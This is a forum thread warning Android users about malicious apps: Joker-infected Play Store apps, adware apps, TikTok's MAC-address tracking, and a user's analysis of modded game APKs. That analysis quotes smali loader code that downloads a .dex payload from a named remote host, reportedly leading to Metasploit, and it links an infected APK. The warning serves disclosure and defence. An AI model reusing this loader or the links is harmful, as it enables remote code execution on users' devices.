Keep yourself informed!
Sep 10th, 2019, 3:05 pm
Alert for new malware detected installed in dozens of applications in the Android Play Store has hit the security company CSIS.
Specifically, the company found that the Joker software is hidden in these applications, which is extremely insidious and ... costly.
Joker secretly writes application users to subscription services so users pay for services they don't use.
Google dumped the infected apps out of the Play Store, but any users who downloaded them should do so right away.

Advocate Wallpaper
Age Face
Altar Message
Antivirus Security - Security Scan
Beach Camera
Board picture editing
Certain Wallpaper
Climate SMS
Collate Face Scanner
Cute Camera
Dazzle Wallpaper
Declare Message
Display Camera
Great VPN
Humour Camera
Ignite Clean
Leaf Face Scanner
Mini Camera
Print Plant scan
Rapid Face Scanner
Reward Clean
Ruddy SMS
Soby Camera
Spark Wallpaper

Extra apps that have been reported that are loaded with adware:

CM Security Applock AntiVirus
Free VPN Master
Funny Sweet Beauty Selfie Camera
HotSpotVPN
Secure VPN
Sun Pro Beauty Camera
Sep 10th, 2019, 3:05 pm

Before make a new topic please:
- Read our Site Rules.
- Use Search Bar for avoid double posts.
- Support developers!
- Enjoy Mobilism!
...and remember: don't take life too seriously...
ImageImage
Sep 21st, 2019, 8:02 pm
Add to that list:
HotSpotVPN
Free VPN Master
Secure VPN
CM Security Applock AntiVirus
Sun Pro Beauty Camera
Funny Sweet Beauty Selfie Camera
Loaded with adware.
Sep 21st, 2019, 8:02 pm
Sep 25th, 2019, 3:38 pm
I`m glad that I don`t install any of this :shock:
Sep 25th, 2019, 3:38 pm
Last edited by AHSANHABIBMUAZ on Sep 25th, 2019, 3:40 pm, edited 1 time in total.
Nov 14th, 2019, 2:31 pm
I was using ai.type keyboard Plus + Emoji for some time :shock: :shock:
Checking my phone rn...
Thank you for the article
Nov 14th, 2019, 2:31 pm
Jan 10th, 2020, 1:28 pm
Lucky, I don't have any of those apps installed.
Jan 10th, 2020, 1:28 pm

Instagram: @Drasik29 :-D
Join Reddit now! Download the app and create an account today! https://reddit.app.link/SWw8soeM0gb
Feb 2nd, 2020, 11:24 pm
Malwarebytes has a good front end to detect this stuff at download and again at install. Saved my arse many a time...
Feb 2nd, 2020, 11:24 pm

... knowledge is the thesis of rebellion!
Aug 14th, 2020, 11:59 am
Today Tik Tok app has been ban and removed from iOS and Android (Playstore) for security reasons: So be aware!
Today's article from a trusted source:
With the US accusing TikTok of spying on American citizens and TikTok itself denying any involvement with the Chinese government, a new investigation is coming to make the company's position even more difficult. According to the Wall Street Journal , TikTok tracked the MAC addresses of Android users by the end of last year.
Unlike cookies which can be easily deleted, MAC addresses are unique to each device and are often used in digital advertising to identify devices. TikTok reportedly took advantage of a known Android security vulnerability and stored MAC addresses for at least 15 months. He even used an extra level of encryption to hide this collection.
This data was collected, of course, without the user's consent, in clear violation of Google's terms of use. A Google spokesman said the company was investigating the Journal's findings, but did not comment on the security breach that allowed applications to collect MAC addresses.
TikTok, in turn, did not deny the allegations or answer specific questions and instead issued the following statement stating that the application no longer uses such tactics.
Aug 14th, 2020, 11:59 am

Before make a new topic please:
- Read our Site Rules.
- Use Search Bar for avoid double posts.
- Support developers!
- Enjoy Mobilism!
...and remember: don't take life too seriously...
ImageImage
Apr 12th, 2021, 11:28 am
Info by @ill420smoker

Hey guys,

I've noticed a dangerous trend in our Android section in the last few months and wanted to share my findings.

While viewing the Android>Games section I would often see the following:
- A brand new user
-- posting perfect topics
-- posting attractive titles
-- posting a few topics in succession
-- never returning to the forum

Of course this immediately sends up a red flag to me.

Upon downloading and inspecting a few of these apps I've noticed there are added .smali files (aka Java classes), which is another red flag. At first I believed this was only ad injection, but it turns out to be much worse.

Take this topic for example:
Idle Miner Tycoon v3.42.0 (Mod Money)
https://forum.mobilism.org/viewtopic.php?f=408&t=4225643

APK:
https://sharemods.com/3ybom9202awx/idle_miner_mod_3.42.0.apk.html

The source of the original mod is AN1.com, and while AN1 does inject their games with adware to profit from their mods this is much more dangerous.

Notable changes:
- Changed startup activity
- Added permissions to Manifest:
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.START_TASKS_FROM_RECENTS"/>
<uses-permission android:name="android.permission.GET_TASKS"/>
<uses-permission android:name="android.permission.REAL_GET_TASKS"/>
<uses-permission android:name="android.permission.REORDER_TASKS"/>
<uses-permission android:name="android.permission.GET_DETAILED_TASKS"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>

The new startup activity downloads another .dex file from the internet:
Code: Select all.method protected varargs a([Ljava/lang/Void;)Ljava/lang/Object;
    .locals 6

    :try_start_0
    new-instance p1, Ljava/net/URL;

    const-string v0, "https://dexapt.com/a/2021-04-11.dex"

    invoke-direct {p1, v0}, Ljava/net/URL;-><init>(Ljava/lang/String;)V

    invoke-virtual {p1}, Ljava/net/URL;->openStream()Ljava/io/InputStream;
...

The website 'dexapt.com' has recently changed from a superficial tech and news website to an app & game site. If you follow the link to https://dexapt.com/a/ you'll see the various .dex files hosted here. Notice the coded .dex file has not been been posted yet. This allows the app to run inconspicuously until they do post it. As some users have reported, Chrome will launch weird webpages after running these apps.

Once the .dex (8k) is available and downloaded it will also download a .dex file (20k) which contains the Metasploit code. After the Metasploit framework is installed, an attacker can remotely execute the following :!:
Image

Moreover, the VirusTotal report for these infected apps/games is clean:
https://www.virustotal.com/gui/file/30b ... af/details
(Notice it's already spread to a2zapk.com)

Metasploit is likely the worst possible malware that a user can be infected with.

An additional search term:
DexClassLoader

I uploaded '2021-03-25.dex' to VT. The two interesting strings are the short links that are launched by Chrome.
https://www.virustotal.com/gui/file/80d ... /detection

- ill420smoker
Apr 12th, 2021, 11:28 am

Before make a new topic please:
- Read our Site Rules.
- Use Search Bar for avoid double posts.
- Support developers!
- Enjoy Mobilism!
...and remember: don't take life too seriously...
ImageImage
Jul 19th, 2021, 4:33 pm
Info by @(GL)Nihon

It have come to my attention that some people might get some *false positive* warnings while using Huawei devices

As seen: https://forum.mobilism.org/viewtopic.php?f=430&t=4249177&p=8793638#p8793638

See picture:

https://imgur.com/a/rxLox27

Searching through the net that report APK:RepSandbox[trj]||ar

https://www.virustotal.com/gui/file/cfd ... /detection

Well need to look into this

Reports from Huawei:

Meanwhile Huawei really do not give much of an answer except:
Hi fuchs.sigma, thank you for reaching Huawei! we do apologized for any inconvenience caused to you. Accessing unauthorized ads or links may infect your device with Trojans and malware that may secretly install themselves and steal your personal data. Running a virus scan can locate and remove potential threats on your Phone. Therefore, we would suggest to use Phone Manager to scan virus.


And some other sort of direction to pm them rather then giving them any real indication why the app is flagged..

So if you're unsure of using the app uninstall it and wait for another version.

But in the other have even tasker have gotten the app as flagged
Jul 19th, 2021, 4:33 pm

Before make a new topic please:
- Read our Site Rules.
- Use Search Bar for avoid double posts.
- Support developers!
- Enjoy Mobilism!
...and remember: don't take life too seriously...
ImageImage
Jul 19th, 2021, 5:43 pm
To further add the app itself is clean (intermediate)

See https://www.virustotal.com/gui/file/56c ... 7d/summary
Human Japanese

https://www.virustotal.com/gui/file/d8a ... 57/summary

But the users uploads have more varning which isn't from the original apk

Please do not that the red flag is only due to debug/test keys
Jul 19th, 2021, 5:43 pm

Welcome to the world Nihon Jr 2016-10-15 08.39pm <3

Currently a bit of here. Sorry